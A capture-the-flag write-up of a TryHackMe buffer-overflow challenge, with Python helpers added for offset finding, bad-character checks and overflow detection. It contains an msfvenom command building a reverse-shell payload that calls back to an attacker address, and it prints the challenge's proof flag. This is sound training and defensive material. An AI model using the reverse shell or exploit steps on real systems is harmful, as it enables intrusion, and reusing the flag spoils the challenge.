Testing Organization: Buffer Overflow Red Team Batch 3
Challenge
Tester's Name: pavanmsvs
TryHackMe ID: noobsyntax
Test Date: 03/07/2021

Copyright © 1996-2021 HackerU Ltd. All Rights Reserved.
PURPOSE OF TESTING

The purpose of this test was to find a vulnerability in the given application and use that vulnerability to gain user
access.

TOOLS USED TO FIND THE SYSTEM AND VULNERABILITY

Nmap was used to check which port the application is running on; msfvenom to create the payload; and the
Metasploit Framework tools pattern_create.rb and pattern_offset.rb to create the pattern and find the offset value.

GATHERING INFORMATION ON THE TARGET SYSTEM AND FINDINGS


We have to connect to the VPN to get access to the THM box.

We will start with the Nmap scan.

From the Nmap scan we can see that only two ports are open, 31337 and 8888, and our application is running on
them. We are already provided with a skeleton of the code; we have to use that skeleton and modify it to gain
user access. From the other port, in the bin directory, we got the vulnerable application; we downloaded it and
transferred it to our testing machine, where we will test our code and try to gain user access.

We can download the vulnerable application and start testing on our Windows machine.
EXPLOITING THE TARGET

Now we will start our testing on the local development system using the skeleton.

We used the skeleton, modifying only the IP to that of my local testing system, as shown. We opened the application
on the testing system in Immunity Debugger, where we will watch the application's details and how our code
affects the application.

As we can see, the application is running; now we will try our crash code by simply executing it from our attacking
system.

As the application crashed from the 500 "A"s sent to it, we will create a pattern of that length and try the crash
once more with our pattern to get the offset value.

For this we will use the Metasploit tool pattern_create.rb; this script creates a unique character pattern of the
length we specify:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500

-l --> length of the pattern

Now we will put this pattern in place of the "A"s in our skeleton code.

Now we have created the code with our pattern of length 500 and will execute it to get the offset value (the exact
crash point of the application).

After executing our code we see that we got an EIP value, which we will use to find the offset of the application,
and at the ESP address we can see our pattern. To find the offset we will use another Metasploit tool,
pattern_offset.rb, which gives the application's offset value.

As seen above, using the EIP value we found the offset of the application, which is 146. Now we will use this value
in our code to control the EIP.
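To make the two Metasploit steps above concrete (pattern_create.rb and then pattern_offset.rb), here is an added Python re-implementation of the same idea. It is example code written for this write-up, not Metasploit's own Ruby, and the EIP value used in the test is constructed to land at the offset of 146 found in this report; the register value is assumed to be read from a 32-bit little-endian x86 process, as it is in Immunity Debugger.

```python
"""Cyclic-pattern generator and offset finder (the idea behind pattern_create.rb
and pattern_offset.rb). The pattern is a sequence of 3-byte triples
(Uppercase, lowercase, digit), so no 4-byte window repeats within the first
26 * 26 * 10 * 3 = 20280 bytes: any 4 bytes seen in EIP map to exactly one offset."""
import string
from typing import Optional, Union

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280


def pattern_create(length: int) -> bytes:
    """Build a cyclic pattern of `length` bytes (like pattern_create.rb -l <length>)."""
    if length > MAX_UNIQUE:
        raise ValueError("length exceeds the unique pattern size (%d)" % MAX_UNIQUE)
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(value: Union[str, bytes], length: int = MAX_UNIQUE) -> Optional[int]:
    """Return the offset at which the 4 bytes found in EIP sit in the pattern
    (like pattern_offset.rb -q <value>), or None if they are not part of it.

    A hex string such as '39654138' is taken as the register value as shown by
    the debugger: x86 is little-endian, so the bytes are reversed before searching.
    Raw bytes are searched as-is."""
    if isinstance(value, str):
        raw = bytes.fromhex(value[2:] if value.lower().startswith("0x") else value)[::-1]
    else:
        raw = bytes(value)
    idx = pattern_create(length).find(raw)
    return idx if idx != -1 else None


if __name__ == "__main__":
    # Constructed EIP value: the bytes of the pattern at offset 146 ("8Ae9"),
    # displayed little-endian as 0x39654138.
    print(pattern_create(500)[:30])
    print("offset:", pattern_offset("39654138"))
```

The test case is the report's own offset: the 4 pattern bytes at position 146 are "8Ae9", which an x86 debugger displays as EIP = 39654138; feeding that string back gives 146. A value that never occurs in the pattern (for example 41414141 from the all-"A" crash probe) returns None, which is how you tell a controlled EIP from an uncontrolled one.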

We will use the skeleton with the offset value in it and pass extra "B" characters to get EIP control.

As seen, at EIP we got the ASCII value of our extra characters, i.e. 42424242. As we have controlled the EIP, we
will now find the bad characters in the application. For this we will use the built-in Mona module of Immunity
Debugger. We will configure a log folder first and then create a byte array using Mona.

!mona config -set workingfolder c:\logs\%p --> to configure log folder

!mona bytearray --> create the byte array used to find bad characters

Once we have created the byte array using Mona, we will copy it into our code and execute it.

We can simply add it as "bad" and append it to the buffer, or pass it as the buff value after the given value of the
skeleton. Once we execute our code we will get the bad characters present in the application, which we have to remove.

!mona bytearray -b “\x00”

Similarly we will remove the bad character from our code as well and execute it to see if any other bad character
is present.

We can see that it says corruption after 0 bytes; we will remove that character from the byte array and execute
the code again. To remove the bad character from the byte array in the log folder we will use the Mona command:

!mona bytearray -b "\x00\x0a"

Similarly we will again remove the bad character from our code and execute it to see if any other bad character
is present.
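The byte-array rounds above (create the array, send it, compare what lands in memory, exclude the corrupted byte, repeat) are the loop that !mona bytearray and !mona compare automate. The following added Python example, written for this report and not part of Mona or the challenge, shows the comparison logic itself. The target is a constructed stand-in that behaves like a C-style string copy (stops at NUL) feeding a line reader (stops at LF); it is not the real challenge binary, but it reproduces the two bad characters found here, \x00 and \x0a.

```python
"""Bad-character discovery by comparing a sent byte array with what is observed
in memory, in the style of !mona bytearray / !mona compare."""
from typing import Callable, Optional, Tuple


def make_bytearray(exclude: bytes = b"") -> bytes:
    """All byte values 0x00..0xFF in order, minus the excluded ones
    (what !mona bytearray -b "<excluded>" writes to bytearray.bin)."""
    return bytes(b for b in range(256) if b not in exclude)


def find_corruption(sent: bytes, observed: bytes) -> Optional[Tuple[int, int]]:
    """Compare the array we sent with the bytes found at the target address.
    Returns (offset, sent_byte) of the first difference, or None if the whole
    array arrived unmodified. A truncated copy counts as corruption at the
    point where the observed data ends (mona reports 'corruption after N bytes')."""
    for i, (s, o) in enumerate(zip(sent, observed)):
        if s != o:
            return i, s
    if len(observed) < len(sent):
        return len(observed), sent[len(observed)]
    return None


def find_bad_chars(send_and_observe: Callable[[bytes], bytes],
                   known_bad: bytes = b"\x00", max_rounds: int = 16) -> bytes:
    """Run the page's loop: build the array without the known bad chars, send it,
    compare, add the first corrupted byte to the exclusion list, repeat until clean.
    `send_and_observe` stands in for 'execute the code, then read memory at ESP'."""
    bad = bytearray(known_bad)
    for _ in range(max_rounds):
        arr = make_bytearray(bytes(bad))
        hit = find_corruption(arr, send_and_observe(arr))
        if hit is None:
            return bytes(bad)
        bad.append(hit[1])
    raise RuntimeError("more bad characters than expected; check the comparison address")


def fake_target_memory(data: bytes) -> bytes:
    """Constructed stand-in for the vulnerable service (NOT the challenge binary):
    input is cut at the first NUL (string copy) and at the first LF (line reader)."""
    for stop in (b"\x00", b"\x0a"):
        if stop in data:
            data = data[:data.index(stop)]
    return data


if __name__ == "__main__":
    # Round with \x00 still in the array: corruption after 0 bytes, as in the report.
    print(find_corruption(make_bytearray(), fake_target_memory(make_bytearray())))
    # Full loop starting from the conventional exclusion of \x00.
    print(find_bad_chars(fake_target_memory))
```

With \x00 left in, the comparison reports corruption at offset 0 (the report's "corruption after 0 bytes"); excluding it exposes \x0a at offset 9 on the next round, and the third round comes back clean, so the final exclusion list is \x00\x0a, exactly the -b value passed to msfvenom later. Excluding a byte that is not actually bad costs nothing but encoder space, so when a comparison is ambiguous it is safer to exclude than to keep.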

Now we are set to create our payload using msfvenom to gain user control and get shell access on the testing
system.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.8 lport=4444 -b "\x00\x0a" -f python

-p --> payload used (here a TCP reverse shell)

lhost --> local host (our system's IP)

lport --> the port on which we want to receive the shell

-b --> bad characters to be excluded from our payload

We copy this buff value into our code, changing it as per the provided skeleton, and add the ESP value and the
NOP padding: Padding = "\x90" * 16
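The buffer described above has a recognisable shape on the wire: a long filler run up to the offset, four bytes for EIP, a NOP sled, then the encoded payload. The following added Python example, written for this report and not part of the challenge or any tool it mentions, shows a defender-side heuristic that flags such input to a network service. The threshold values and the sample messages are constructed; the legitimate request size for this service is assumed to be well under 128 bytes.

```python
"""Heuristic inspection of service input for stack-overflow probes and payloads:
oversized requests, long runs of a single byte (the 500 "A" crash probe or the
filler up to the offset), and NOP sleds (runs of 0x90)."""
from collections import namedtuple
from typing import List, Optional

Finding = namedtuple("Finding", "suspicious longest_run nop_run length reasons")

MAX_EXPECTED_LEN = 128   # assumed: legitimate requests to this service are short
RUN_THRESHOLD = 64       # a run of one byte this long is never a normal request
NOP_SLED_THRESHOLD = 8   # this report's padding is 16 NOPs


def longest_run(data: bytes, only: Optional[int] = None) -> int:
    """Length of the longest run of one repeated byte value.
    With `only` set, count runs of that single value (e.g. 0x90) and nothing else."""
    best = cur = 0
    prev = None
    for b in data:
        if only is not None and b != only:
            cur, prev = 0, None
            continue
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def inspect_payload(data: bytes) -> Finding:
    """Score one request; `reasons` lists every rule that fired."""
    reasons: List[str] = []
    run = longest_run(data)
    nops = longest_run(data, only=0x90)
    if len(data) > MAX_EXPECTED_LEN:
        reasons.append("oversized input")
    if run >= RUN_THRESHOLD:
        reasons.append("long run of one byte (crash probe / offset filler)")
    if nops >= NOP_SLED_THRESHOLD:
        reasons.append("NOP sled")
    return Finding(bool(reasons), run, nops, len(data), reasons)


# Constructed samples (not captured traffic): a normal request, the 500-"A"
# crash probe from this report, and a buffer laid out like the one described
# (146 filler bytes, 4 bytes of EIP, 16 NOPs, then a placeholder for the
# encoded payload; "X" * 32 is a stand-in, not shellcode).
SAMPLE_BENIGN = b"hello\n"
SAMPLE_PROBE = b"A" * 500
SAMPLE_LAYOUT = b"A" * 146 + b"BBBB" + b"\x90" * 16 + b"X" * 32


if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("probe", SAMPLE_PROBE),
                         ("layout", SAMPLE_LAYOUT)):
        print(name, inspect_payload(sample))
```

A cyclic pattern such as the one used to find the offset contains no long runs, so on that input only the size rule fires; that is why the length check is kept alongside the run and sled checks. On a real sensor these three rules would be one signal among several, tuned to the service's actual request sizes.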

On executing our shellcode we got the local system shell; thus we successfully created shellcode that gave us
local system access. Now we will create the payload for the THM machine: as we are connected through the VPN,
we will use the tun0 IP in the payload and change the target IP in our code.

Proof flag: 40E44BACF8B1464C8882D08160F6EF4A4FCC4676

We successfully got user access to the system and got the flag, which we submitted in THM.
